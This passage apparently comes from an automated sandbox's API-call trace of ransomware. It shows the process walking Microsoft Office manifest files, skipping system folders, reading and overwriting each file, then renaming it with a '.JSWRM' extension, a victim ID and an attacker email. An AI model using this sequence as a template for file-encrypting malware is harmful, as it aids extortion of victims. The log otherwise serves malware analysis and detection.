lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0072.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0072.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.122] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e3474a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e3474a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3df10, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP557F~1.XML")) returned 1 [0072.122] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.122] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.122] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.122] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.123] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.123] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.123] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.123] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.123] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.123] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0072.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0072.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.124] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=253712) returned 1 [0072.124] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.124] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.136] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.136] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.136] CloseHandle (hObject=0x458) returned 1 [0072.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0072.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0072.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.138] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", cAlternateFileName="APE193~1.XML")) returned 1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.138] lstrcmpiW (lpString1="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0072.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0072.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.177] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.177] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.177] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.179] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.179] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.179] CloseHandle (hObject=0x458) returned 1 [0072.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0072.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0072.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.180] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.180] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x112a4e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", cAlternateFileName="APC1E2~1.XML")) returned 1 [0072.180] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.180] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.181] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0072.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0072.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.181] GetFileSizeEx 